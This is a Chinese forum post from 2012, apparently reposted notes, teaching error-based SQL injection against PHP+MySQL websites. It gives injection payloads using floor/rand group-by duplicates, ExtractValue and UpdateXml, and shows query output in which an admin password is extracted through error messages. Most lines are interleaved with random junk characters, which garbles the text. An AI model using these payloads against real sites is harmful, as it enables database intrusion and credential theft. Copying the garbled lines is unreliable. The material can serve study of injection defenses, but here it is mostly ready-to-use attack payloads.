放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
) F3 ]- t% l# H7 c实际测试环境:
5 ~8 `3 ^% `* a4 q
1 R: a, A1 P. Z- \2 A
1 u4 X* d- V5 I" e+ hmysql> show tables;
. F, C- o3 ?8 P0 o# L+----------------+
" f) {1 l& d; F| Tables_in_test |# ~3 Y6 L0 n; E7 w8 _5 X1 w
+----------------+
8 S7 `1 `; P. U, w| admin |
% F7 g( R5 G7 }7 {( F7 i( I| article |
( p: o9 P. w2 m+----------------+8 t# f4 | n9 a- W; o4 A" o
1 O6 `' }. S' @' v 9 v9 q b4 L: v$ o
8 p! b$ }+ D) b9 J7 umysql> describe admin;: m( @9 N: \; v2 E# `9 c T- i
+-------+------------------+------+-----+---------+----------------+
6 B8 w" Y' H6 G6 m' E| Field | Type | Null | Key | Default | Extra |
! @: H( \2 I+ W+-------+------------------+------+-----+---------+----------------+. X( R g. ]' x( h$ e0 E
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
% Z( Z. L" a$ v2 c* ~| user | varchar(50) | NO | | NULL | |9 d' P$ j8 E0 @- g
| pass | varchar(50) | NO | | NULL | |% W. Z+ k/ e. E/ E5 ]
+-------+------------------+------+-----+---------+----------------+9 l% N& K! g3 C0 o$ U" X' e
- V. |$ H9 y5 O / O: b# N4 N* M* L
) A+ ], p4 d" P; ?$ f9 }, s; ]* Cmysql> describe article;
4 ~3 `( U5 Y: J+ J+---------+------------------+------+-----+---------+----------------+
! [/ v% ~5 O- O- x- h" V| Field | Type | Null | Key | Default | Extra |
. }$ w# j3 [6 c+---------+------------------+------+-----+---------+----------------+
$ @7 y" t& {6 A4 b, w2 q% e| id | int(10) unsigned | NO | PRI | NULL | auto_increment |$ \! N/ i( ^; e+ {8 R( H" X0 P
| title | varchar(50) | NO | | NULL | |
2 ^% [+ c' o8 X- ]2 H) A| content | varchar(50) | NO | | NULL | |. i" e5 D. ~" A7 c h% B
+---------+------------------+------+-----+---------+----------------+- D" b. b* _+ {* ^& g
1、通过floor报错
4 I) X7 i0 {+ Y. d& F. C9 x可以通过如下一些利用代码
- i; R. R J. ~" X+ v$ q% M . s9 p* P! M, ?5 L1 i6 e) `7 A, F
% [6 `1 S0 R/ r1 ^' \
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x' k1 X: C0 Y0 F) E o8 j) a
from information_schema.tables group by x)a);
# m9 ^3 \ [# {: u 1 e/ S' ^: F$ V: p! r) X) w) _9 y& O
* d! a/ g$ j* @/ J" ]1 N
and (select count(*) from (select 1 union select null union select !1)x
4 Y" b1 F. m- n& Z! \group by concat((select table_name from information_schema.tables limit 1),
. Q; D; O5 _! j+ @2 \& Q' nfloor(rand(0)*2)));
$ p& ]* p! z7 ?2 f& B5 l举例如下:
8 z1 ?& F) _! ?' g3 v6 m* U! x首先进行正常查询:* g( r5 i( Z, T8 s9 R1 y, k
7 Y% T- Q' |$ H; _7 Xmysql> select * from article where id = 1;
, R4 {1 d! E, a5 T) o3 j+----+-------+---------+
3 Y' X& a& N0 ?/ Y% T* J" G+ H| id | title | content |
i$ L/ D, g1 Y, n. N% {" D- q+----+-------+---------+' Z" q5 i6 V' H; R; Y
| 1 | test | do it |
2 o9 p; u2 \; \+ Y# m+----+-------+---------+
4 u9 O5 O) q8 a- X+ a3 a假如id输入存在注入的话,可以通过如下语句进行报错。6 `# d* Q, C1 p5 {) O+ {
: U; P) o2 I9 O6 |/ s0 r. F+ C6 L( C
' ~3 P! g) V. @& @* ^, imysql> select * from article where id = 1 and (select 1 from5 h3 `/ n0 A; t1 a4 E& K! Y: {+ k
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);6 }0 V' O- A8 z! S
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'4 F8 r. X. z2 d( |0 Q+ Y3 w
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
. i6 m. C& G, v* K) l: Q1 v例如我们需要查询管理员用户名和密码:
B5 S$ G2 S( zMethod1:
% K) q8 e$ g/ h7 D& z$ h7 {9 J& d/ f
1 e& V/ [ A! |1 t
- t' {3 c- `# a2 i& l0 I( z1 imysql> select * from article where id = 1 and (select 1 from
5 }+ M& Z9 X- m" \(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x- q/ E, H4 K2 X2 ^7 |
from information_schema.tables group by x)a);
; Z% ^. Z2 V! K" t# Z! HERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
' D/ N# m& l3 f6 [% ^: K8 W) MMethod2:( W0 x2 H9 M- M$ n2 l( }" }3 B
2 j6 U; k# |1 B7 x. @
0 c6 U" u/ ]! x
mysql> select * from article where id = 1 and (select count(*)* j; s3 h8 J* x0 d. g
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),0 J" Y+ ~1 u6 E
floor(rand(0)*2)));: M1 I$ w8 n) V
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
+ f7 w, x6 t. X6 h& \1 y2、ExtractValue
k" E% y% N# a0 Z& Y" n测试语句如下
O: h; I% p9 a+ q! N! N# B" Z 5 t: Z! Y% s \0 a% b
7 Z" J! B3 e) }0 t+ s% m0 g1 B+ t
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));# U' P! |% h; Y$ Z' K8 Q
实际测试过程
: l3 @1 A7 Z& ^ l
8 S8 D- y# f5 g5 V4 z- M% y$ F 3 l7 C: b. r5 N' Q$ h
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
$ U1 {( Y6 l u8 h(select pass from admin limit 1)));--
' c0 |% x0 D) f4 C% \' _7 w3 ]ERROR 1105 (HY000): XPATH syntax error: '\admin888'
$ c, D& ~ \0 ]2 }) O8 a3、UpdateXml
6 T+ w3 A1 T4 h' }1 J测试语句
% J* `4 y. {0 y7 x r1 I& ^
j+ I: c+ h5 a! D* f7 Y& j
/ i( D2 D8 p4 r; ]1 o1 jand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) z" }9 g( X: x5 ] w, Q
实际测试过程
4 T9 x6 G- I7 d
+ t2 i/ m! ~ A3 f6 G
7 s1 l1 @' g$ A+ R3 Q: o7 D# R1 Smysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
7 I7 \3 |* ]9 N% e" W! x(select pass from admin limit 1),0x5e24),1));& h/ b; l: H6 w; M3 u8 @4 F
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
0 [1 Q* L4 D* m8 F PAll, thanks foreign guys.( y& `3 `% V% c) f( _3 f8 O4 h
: v: E% E. `% G3 K- Y, N( t
K' X4 E5 o& b/ |& i$ y; R2 x
|
发表于 2012-12-10 10:28:51
收藏
支持
反对